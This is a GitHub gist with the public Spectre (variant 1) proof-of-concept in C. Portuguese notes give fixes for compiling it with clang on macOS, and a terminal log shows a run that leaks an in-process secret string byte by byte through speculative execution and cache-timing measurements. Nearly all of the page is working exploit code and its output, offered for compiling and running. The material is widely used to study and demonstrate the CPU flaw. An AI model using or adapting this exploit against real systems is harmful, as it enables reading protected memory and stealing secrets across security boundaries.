Skip to content

Instantly share code, notes, and snippets.

@loganbr

loganbr/POC Intel (spectre) Secret

Last active January 5, 2018 03:24
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save loganbr/f0a7f12c6ec4972d925f1d468df9d7f7 to your computer and use it in GitHub Desktop.
Save loganbr/f0a7f12c6ec4972d925f1d468df9d7f7 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
POC Intel (spectre)
Source spectre.c
https://gist.githubusercontent.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6/raw/41bf9bd0e7577fe3d7b822bbae1fec2e818dcdd6/spectre.c
micropatch (macOS)
Arquitetura: Intel
Linha 50
#define CACHE_HIT_THRESHOLD(80)
Muda Para:(inserir o espaço)
#define CACHE_HIT_THRESHOLD (80)
* Voce pode aumentar o valor conforme deseja
Linha 136
(value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
Muda Para: Usar aspas simples
(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
Compilar (usando clang):
clang -std=c99 -O0 spectre.c -o spectre
Raw
Result
l0gan@S1th:[~/Downloads/vuln_intel][00:22:38]:[bash]
└──────> $:> ./spectre
Reading 40 bytes:
Reading at malicious_x = 0xfffffffffffffebe... Unclear: 0x54=’T’ score=991 (second best: 0x02 score=721)
Reading at malicious_x = 0xfffffffffffffebf... Unclear: 0x68=’h’ score=998 (second best: 0x02 score=887)
Reading at malicious_x = 0xfffffffffffffec0... Unclear: 0x65=’e’ score=994 (second best: 0x02 score=772)
Reading at malicious_x = 0xfffffffffffffec1... Unclear: 0x20=’ ’ score=996 (second best: 0x02 score=840)
Reading at malicious_x = 0xfffffffffffffec2... Unclear: 0x4D=’M’ score=997 (second best: 0x02 score=729)
Reading at malicious_x = 0xfffffffffffffec3... Success: 0x61=’a’ score=73 (second best: 0x02 score=34)
Reading at malicious_x = 0xfffffffffffffec4... Unclear: 0x67=’g’ score=997 (second best: 0x02 score=812)
Reading at malicious_x = 0xfffffffffffffec5... Unclear: 0x69=’i’ score=994 (second best: 0x02 score=706)
Reading at malicious_x = 0xfffffffffffffec6... Unclear: 0x63=’c’ score=996 (second best: 0x02 score=828)
Reading at malicious_x = 0xfffffffffffffec7... Unclear: 0x20=’ ’ score=999 (second best: 0x02 score=919)
Reading at malicious_x = 0xfffffffffffffec8... Unclear: 0x57=’W’ score=986 (second best: 0x02 score=901)
Reading at malicious_x = 0xfffffffffffffec9... Success: 0x6F=’o’ score=17 (second best: 0x02 score=6)
Reading at malicious_x = 0xfffffffffffffeca... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xfffffffffffffecb... Success: 0x64=’d’ score=2
Reading at malicious_x = 0xfffffffffffffecc... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xfffffffffffffecd... Success: 0x20=’ ’ score=7 (second best: 0x01 score=1)
Reading at malicious_x = 0xfffffffffffffece... Unclear: 0x61=’a’ score=995 (second best: 0x02 score=853)
Reading at malicious_x = 0xfffffffffffffecf... Unclear: 0x72=’r’ score=999 (second best: 0x02 score=557)
Reading at malicious_x = 0xfffffffffffffed0... Unclear: 0x65=’e’ score=992 (second best: 0x02 score=610)
Reading at malicious_x = 0xfffffffffffffed1... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xfffffffffffffed2... Success: 0x53=’S’ score=2
Reading at malicious_x = 0xfffffffffffffed3... Unclear: 0x71=’q’ score=987 (second best: 0x02 score=903)
Reading at malicious_x = 0xfffffffffffffed4... Unclear: 0x75=’u’ score=998 (second best: 0x02 score=861)
Reading at malicious_x = 0xfffffffffffffed5... Unclear: 0x65=’e’ score=994 (second best: 0x02 score=859)
Reading at malicious_x = 0xfffffffffffffed6... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xfffffffffffffed7... Success: 0x6D=’m’ score=43 (second best: 0x02 score=19)
Reading at malicious_x = 0xfffffffffffffed8... Unclear: 0x69=’i’ score=999 (second best: 0x02 score=862)
Reading at malicious_x = 0xfffffffffffffed9... Unclear: 0x73=’s’ score=998 (second best: 0x02 score=867)
Reading at malicious_x = 0xfffffffffffffeda... Unclear: 0x68=’h’ score=994 (second best: 0x02 score=815)
Reading at malicious_x = 0xfffffffffffffedb... Unclear: 0x20=’ ’ score=987 (second best: 0x02 score=908)
Reading at malicious_x = 0xfffffffffffffedc... Unclear: 0x4F=’O’ score=997 (second best: 0x02 score=816)
Reading at malicious_x = 0xfffffffffffffedd... Unclear: 0x73=’s’ score=996 (second best: 0x02 score=916)
Reading at malicious_x = 0xfffffffffffffede... Success: 0x73=’s’ score=181 (second best: 0x00 score=88)
Reading at malicious_x = 0xfffffffffffffedf... Unclear: 0x69=’i’ score=989 (second best: 0x02 score=889)
Reading at malicious_x = 0xfffffffffffffee0... Unclear: 0x66=’f’ score=991 (second best: 0x02 score=906)
Reading at malicious_x = 0xfffffffffffffee1... Unclear: 0x72=’r’ score=995 (second best: 0x02 score=863)
Reading at malicious_x = 0xfffffffffffffee2... Unclear: 0x61=’a’ score=998 (second best: 0x02 score=860)
Reading at malicious_x = 0xfffffffffffffee3... Unclear: 0x67=’g’ score=999 (second best: 0x02 score=924)
Reading at malicious_x = 0xfffffffffffffee4... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xfffffffffffffee5... Success: 0x2E=’.’ score=2
l0gan@S1th:[~/Downloads/vuln_intel][00:22:41]:[bash]
└──────> $:>
Raw
spectre.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
/********************************************************************
Victim code.
https://gist.githubusercontent.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6/raw/41bf9bd0e7577fe3d7b822bbae1fec2e818dcdd6/spectre.c
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16
};
uint8_t unused2[64];
uint8_t array2[256 * 512];
char * secret = "The Magic Words are Squeamish Ossifrage.";
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
void victim_function(size_t x) {
if (x < array1_size) {
temp &= array2[array1[x] * 512];
}
}
/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
int tries, i, j, k, mix_i, junk = 0;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t * addr;
for (i = 0; i < 256; i++)
results[i] = 0;
for (tries = 999; tries > 0; tries--) {
/* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++)
_mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--) {
_mm_clflush( & array1_size);
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */
victim_function(x);
}
/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512];
time1 = __rdtscp( & junk); /* READ TIMER */
junk = * addr; /* MEMORY ACCESS TO TIME */
time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
}
/* Locate highest & second-highest results results tallies in j/k */
j = k = -1;
for (i = 0; i < 256; i++) {
if (j < 0 || results[i] >= results[j]) {
k = j;
j = i;
} else if (k < 0 || results[i] >= results[k]) {
k = i;
}
}
if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
}
results[0] ^= junk; /* use junk so code above won’t get optimized out*/
value[0] = (uint8_t) j;
score[0] = results[j];
value[1] = (uint8_t) k;
score[1] = results[k];
}
int main(int argc,
const char * * argv) {
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
int i, score[2], len = 40;
uint8_t value[2];
for (i = 0; i < sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
if (argc == 3) {
sscanf(argv[1], "%p", (void * * )( & malicious_x));
malicious_x -= (size_t) array1; /* Convert input value into a pointer */
sscanf(argv[2], "%d", & len);
}
printf("Reading %d bytes:\n", len);
while (--len >= 0) {
printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
readMemoryByte(malicious_x++, value, score);
printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
printf("0x%02X=’%c’ score=%d ", value[0],
(value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
if (score[1] > 0)
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n");
}
return (0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment